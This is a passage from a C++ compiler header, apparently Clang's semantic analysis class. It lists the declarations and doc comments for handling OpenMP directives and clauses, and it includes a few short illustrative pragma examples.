NamedDeclSetType &SameDirectiveDecls);
/// Called on correct id-expression from the '#pragma omp declare target'.
void ActOnOpenMPDeclareTargetName(NamedDecl *ND, SourceLocation Loc,
OMPDeclareTargetDeclAttr::MapTypeTy MT,
OMPDeclareTargetDeclAttr::DevTypeTy DT);
/// Check declaration inside target region.
void
checkDeclIsAllowedInOpenMPTarget(Expr *E, Decl *D,
SourceLocation IdLoc = SourceLocation());
/// Return true inside OpenMP declare target region.
bool isInOpenMPDeclareTargetContext() const {
return DeclareTargetNestingLevel > 0;
}
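// For illustration, a sketch (standard OpenMP syntax) of the region whose
// nesting DeclareTargetNestingLevel tracks:
//
//   #pragma omp declare target
//   int device_table[128];   // treated as a declare-target declaration
//   #pragma omp end declare target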
/// Return true inside OpenMP target region.
bool isInOpenMPTargetExecutionDirective() const;
/// Return the number of captured regions created for an OpenMP directive.
static int getOpenMPCaptureLevels(OpenMPDirectiveKind Kind);
/// Initialization of captured region for OpenMP region.
void ActOnOpenMPRegionStart(OpenMPDirectiveKind DKind, Scope *CurScope);
/// End of OpenMP region.
///
/// \param S Statement associated with the current OpenMP region.
/// \param Clauses List of clauses for the current OpenMP region.
///
/// \returns Statement for finished OpenMP region.
StmtResult ActOnOpenMPRegionEnd(StmtResult S, ArrayRef<OMPClause *> Clauses);
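/// Called once a complete executable directive of kind \p Kind, with clauses
/// \p Clauses and associated statement \p AStmt (if any), has been parsed;
/// builds the directive and dispatches to the directive-specific handler.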
StmtResult ActOnOpenMPExecutableDirective(
OpenMPDirectiveKind Kind, const DeclarationNameInfo &DirName,
OpenMPDirectiveKind CancelRegion, ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc, SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPParallelDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
using VarsWithInheritedDSAType =
llvm::SmallDenseMap<const ValueDecl *, const Expr *, 4>;
/// Called on well-formed '\#pragma omp simd' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp for' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPForDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp for simd' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPForSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp sections' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPSectionsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp section' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPSectionDirective(Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp single' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPSingleDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp master' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPMasterDirective(Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp critical' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPCriticalDirective(const DeclarationNameInfo &DirName,
ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel for' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel for simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel sections' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelSectionsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp task' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTaskDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskyield'.
StmtResult ActOnOpenMPTaskyieldDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp barrier'.
StmtResult ActOnOpenMPBarrierDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskwait'.
StmtResult ActOnOpenMPTaskwaitDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskgroup'.
StmtResult ActOnOpenMPTaskgroupDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp flush'.
StmtResult ActOnOpenMPFlushDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp ordered' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPOrderedDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp atomic' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPAtomicDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTargetDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target data' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTargetDataDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target enter data' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetEnterDataDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp target exit data' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetExitDataDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp target parallel' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target parallel for' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTeamsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp cancellation point'.
StmtResult
ActOnOpenMPCancellationPointDirective(SourceLocation StartLoc,
SourceLocation EndLoc,
OpenMPDirectiveKind CancelRegion);
/// Called on well-formed '\#pragma omp cancel'.
StmtResult ActOnOpenMPCancelDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
OpenMPDirectiveKind CancelRegion);
/// Called on well-formed '\#pragma omp taskloop' after parsing of the
/// associated statement.
StmtResult
ActOnOpenMPTaskLoopDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp taskloop simd' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp master taskloop' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPMasterTaskLoopDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp master taskloop simd' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPMasterTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master taskloop' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterTaskLoopDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master taskloop simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPDistributeDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target update'.
StmtResult ActOnOpenMPTargetUpdateDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp distribute parallel for' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute parallel for simd'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target parallel for simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target simd' after parsing of
/// the associated statement.
StmtResult
ActOnOpenMPTargetSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTeamsDistributeDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute simd' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute parallel for simd'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute parallel for'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTargetTeamsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target teams distribute' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute parallel for'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute parallel for
/// simd' after parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Checks correctness of linear modifiers.
bool CheckOpenMPLinearModifier(OpenMPLinearClauseKind LinKind,
SourceLocation LinLoc);
/// Checks that the specified declaration matches requirements for the linear
/// decls.
bool CheckOpenMPLinearDecl(const ValueDecl *D, SourceLocation ELoc,
OpenMPLinearClauseKind LinKind, QualType Type);
/// Called on well-formed '\#pragma omp declare simd' after parsing of
/// the associated method/function.
DeclGroupPtrTy ActOnOpenMPDeclareSimdDirective(
DeclGroupPtrTy DG, OMPDeclareSimdDeclAttr::BranchStateTy BS,
Expr *Simdlen, ArrayRef<Expr *> Uniforms, ArrayRef<Expr *> Aligneds,
ArrayRef<Expr *> Alignments, ArrayRef<Expr *> Linears,
ArrayRef<unsigned> LinModifiers, ArrayRef<Expr *> Steps, SourceRange SR);
/// Checks '\#pragma omp declare variant' variant function and original
/// functions after parsing of the associated method/function.
/// \param DG Function declaration to which the declare variant directive is
/// applied.
/// \param VariantRef Expression that references the variant function, which
/// must be used instead of the original one, specified in \p DG.
/// \returns None if the function and the variant function are not compatible
/// with the pragma; otherwise, the pair of the original function and the
/// variant reference expression.
Optional<std::pair<FunctionDecl *, Expr *>> checkOpenMPDeclareVariantFunction(
DeclGroupPtrTy DG, Expr *VariantRef, SourceRange SR);
/// Called on well-formed '\#pragma omp declare variant' after parsing of
/// the associated method/function.
/// \param FD Function declaration to which the declare variant directive is
/// applied.
/// \param VariantRef Expression that references the variant function, which
/// must be used instead of the original one, specified in \p FD.
/// \param Data Set of context-specific data for the specified context
/// selector.
void ActOnOpenMPDeclareVariantDirective(FunctionDecl *FD, Expr *VariantRef,
SourceRange SR,
ArrayRef<OMPCtxSelectorData> Data);
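// For illustration, a sketch (OpenMP 5.0 syntax; 'base'/'fast_base' are
// made-up names) of the pragma these declarations model:
//
//   int fast_base(int x);
//   #pragma omp declare variant(fast_base) match(construct={parallel})
//   int base(int x);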
OMPClause *ActOnOpenMPSingleExprClause(OpenMPClauseKind Kind,
Expr *Expr,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'allocator' clause.
OMPClause *ActOnOpenMPAllocatorClause(Expr *Allocator,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'if' clause.
OMPClause *ActOnOpenMPIfClause(OpenMPDirectiveKind NameModifier,
Expr *Condition, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation NameModifierLoc,
SourceLocation ColonLoc,
SourceLocation EndLoc);
/// Called on well-formed 'final' clause.
OMPClause *ActOnOpenMPFinalClause(Expr *Condition, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'num_threads' clause.
OMPClause *ActOnOpenMPNumThreadsClause(Expr *NumThreads,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'safelen' clause.
OMPClause *ActOnOpenMPSafelenClause(Expr *Length,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'simdlen' clause.
OMPClause *ActOnOpenMPSimdlenClause(Expr *Length, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'collapse' clause.
OMPClause *ActOnOpenMPCollapseClause(Expr *NumForLoops,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'ordered' clause.
OMPClause *
ActOnOpenMPOrderedClause(SourceLocation StartLoc, SourceLocation EndLoc,
SourceLocation LParenLoc = SourceLocation(),
Expr *NumForLoops = nullptr);
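// For illustration (a sketch, standard OpenMP syntax): the clause may appear
// bare or with a loop count, which is why LParenLoc/NumForLoops are optional:
//
//   #pragma omp for ordered        // no argument
//   #pragma omp for ordered(2)     // doacross form, two associated loops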
/// Called on well-formed 'grainsize' clause.
OMPClause *ActOnOpenMPGrainsizeClause(Expr *Size, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'num_tasks' clause.
OMPClause *ActOnOpenMPNumTasksClause(Expr *NumTasks, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'hint' clause.
OMPClause *ActOnOpenMPHintClause(Expr *Hint, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
OMPClause *ActOnOpenMPSimpleClause(OpenMPClauseKind Kind,
unsigned Argument,
SourceLocation ArgumentLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'default' clause.
OMPClause *ActOnOpenMPDefaultClause(OpenMPDefaultClauseKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'proc_bind' clause.
OMPClause *ActOnOpenMPProcBindClause(llvm::omp::ProcBindKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
OMPClause *ActOnOpenMPSingleExprWithArgClause(
OpenMPClauseKind Kind, ArrayRef<unsigned> Arguments, Expr *Expr,
SourceLocation StartLoc, SourceLocation LParenLoc,
ArrayRef<SourceLocation> ArgumentsLoc, SourceLocation DelimLoc,
SourceLocation EndLoc);
/// Called on well-formed 'schedule' clause.
OMPClause *ActOnOpenMPScheduleClause(
OpenMPScheduleClauseModifier M1, OpenMPScheduleClauseModifier M2,
OpenMPScheduleClauseKind Kind, Expr *ChunkSize, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation M1Loc, SourceLocation M2Loc,
SourceLocation KindLoc, SourceLocation CommaLoc, SourceLocation EndLoc);
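// For illustration, how the parameters map onto source (a sketch):
//
//   #pragma omp for schedule(monotonic, dynamic : 4)
//
// Here M1 is 'monotonic', Kind is 'dynamic', and ChunkSize is '4'; the second
// modifier M2 is absent in this example.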
OMPClause *ActOnOpenMPClause(OpenMPClauseKind Kind, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'nowait' clause.
OMPClause *ActOnOpenMPNowaitClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'untied' clause.
OMPClause *ActOnOpenMPUntiedClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'mergeable' clause.
OMPClause *ActOnOpenMPMergeableClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'read' clause.
OMPClause *ActOnOpenMPReadClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'write' clause.
OMPClause *ActOnOpenMPWriteClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'update' clause.
OMPClause *ActOnOpenMPUpdateClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'capture' clause.
OMPClause *ActOnOpenMPCaptureClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'seq_cst' clause.
OMPClause *ActOnOpenMPSeqCstClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'threads' clause.
OMPClause *ActOnOpenMPThreadsClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'simd' clause.
OMPClause *ActOnOpenMPSIMDClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'nogroup' clause.
OMPClause *ActOnOpenMPNogroupClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'unified_address' clause.
OMPClause *ActOnOpenMPUnifiedAddressClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'unified_shared_memory' clause.
OMPClause *ActOnOpenMPUnifiedSharedMemoryClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'reverse_offload' clause.
OMPClause *ActOnOpenMPReverseOffloadClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'dynamic_allocators' clause.
OMPClause *ActOnOpenMPDynamicAllocatorsClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'atomic_default_mem_order' clause.
OMPClause *ActOnOpenMPAtomicDefaultMemOrderClause(
OpenMPAtomicDefaultMemOrderClauseKind Kind, SourceLocation KindLoc,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation EndLoc);
OMPClause *ActOnOpenMPVarListClause(
OpenMPClauseKind Kind, ArrayRef<Expr *> Vars, Expr *TailExpr,
const OMPVarListLocTy &Locs, SourceLocation ColonLoc,
CXXScopeSpec &ReductionOrMapperIdScopeSpec,
DeclarationNameInfo &ReductionOrMapperId, int ExtraModifier,
ArrayRef<OpenMPMapModifierKind> MapTypeModifiers,
ArrayRef<SourceLocation> MapTypeModifiersLoc, bool IsMapTypeImplicit,
SourceLocation DepLinMapLastLoc);
/// Called on well-formed 'allocate' clause.
OMPClause *
ActOnOpenMPAllocateClause(Expr *Allocator, ArrayRef<Expr *> VarList,
SourceLocation StartLoc, SourceLocation ColonLoc,
SourceLocation LParenLoc, SourceLocation EndLoc);
/// Called on well-formed 'private' clause.
OMPClause *ActOnOpenMPPrivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'firstprivate' clause.
OMPClause *ActOnOpenMPFirstprivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'lastprivate' clause.
OMPClause *ActOnOpenMPLastprivateClause(
ArrayRef<Expr *> VarList, OpenMPLastprivateModifier LPKind,
SourceLocation LPKindLoc, SourceLocation ColonLoc,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation EndLoc);
/// Called on well-formed 'shared' clause.
OMPClause *ActOnOpenMPSharedClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'reduction' clause.
OMPClause *ActOnOpenMPReductionClause(
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation ColonLoc, SourceLocation EndLoc,
CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
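// For illustration (a sketch): ReductionId names a builtin operator or a
// user-declared reduction ('mymax' below is a made-up name):
//
//   #pragma omp parallel for reduction(+ : sum)
//   #pragma omp parallel for reduction(mymax : best)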
/// Called on well-formed 'task_reduction' clause.
OMPClause *ActOnOpenMPTaskReductionClause(
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation ColonLoc, SourceLocation EndLoc,
CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
/// Called on well-formed 'in_reduction' clause.
OMPClause *ActOnOpenMPInReductionClause(
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation ColonLoc, SourceLocation EndLoc,
CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
/// Called on well-formed 'linear' clause.
OMPClause *
ActOnOpenMPLinearClause(ArrayRef<Expr *> VarList, Expr *Step,
SourceLocation StartLoc, SourceLocation LParenLoc,
OpenMPLinearClauseKind LinKind, SourceLocation LinLoc,
SourceLocation ColonLoc, SourceLocation EndLoc);
/// Called on well-formed 'aligned' clause.
OMPClause *ActOnOpenMPAlignedClause(ArrayRef<Expr *> VarList,
Expr *Alignment,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation ColonLoc,
SourceLocation EndLoc);
/// Called on well-formed 'copyin' clause.
OMPClause *ActOnOpenMPCopyinClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'copyprivate' clause.
OMPClause *ActOnOpenMPCopyprivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'flush' pseudo clause.
OMPClause *ActOnOpenMPFlushClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'depend' clause.
OMPClause *
ActOnOpenMPDependClause(OpenMPDependClauseKind DepKind, SourceLocation DepLoc,
SourceLocation ColonLoc, ArrayRef<Expr *> VarList,
SourceLocation StartLoc, SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'device' clause.
OMPClause *ActOnOpenMPDeviceClause(Expr *Device, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'map' clause.
OMPClause *
ActOnOpenMPMapClause(ArrayRef<OpenMPMapModifierKind> MapTypeModifiers,
ArrayRef<SourceLocation> MapTypeModifiersLoc,
CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId,
OpenMPMapClauseKind MapType, bool IsMapTypeImplicit,
SourceLocation MapLoc, SourceLocation ColonLoc,
ArrayRef<Expr *> VarList, const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
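// For illustration (a sketch, OpenMP 4.5/5.0 syntax): map-type modifiers,
// an optional mapper, the map type, and the mapped list:
//
//   #pragma omp target map(always, to : a[0:n])
//   #pragma omp target map(mapper(id), tofrom : s)   // 'id' is a made-up name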
/// Called on well-formed 'num_teams' clause.
OMPClause *ActOnOpenMPNumTeamsClause(Expr *NumTeams, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'thread_limit' clause.
OMPClause *ActOnOpenMPThreadLimitClause(Expr *ThreadLimit,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'priority' clause.
OMPClause *ActOnOpenMPPriorityClause(Expr *Priority, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'dist_schedule' clause.
OMPClause *ActOnOpenMPDistScheduleClause(
OpenMPDistScheduleClauseKind Kind, Expr *ChunkSize,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation KindLoc,
SourceLocation CommaLoc, SourceLocation EndLoc);
/// Called on well-formed 'defaultmap' clause.
OMPClause *ActOnOpenMPDefaultmapClause(
OpenMPDefaultmapClauseModifier M, OpenMPDefaultmapClauseKind Kind,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation MLoc,
SourceLocation KindLoc, SourceLocation EndLoc);
/// Called on well-formed 'to' clause.
OMPClause *
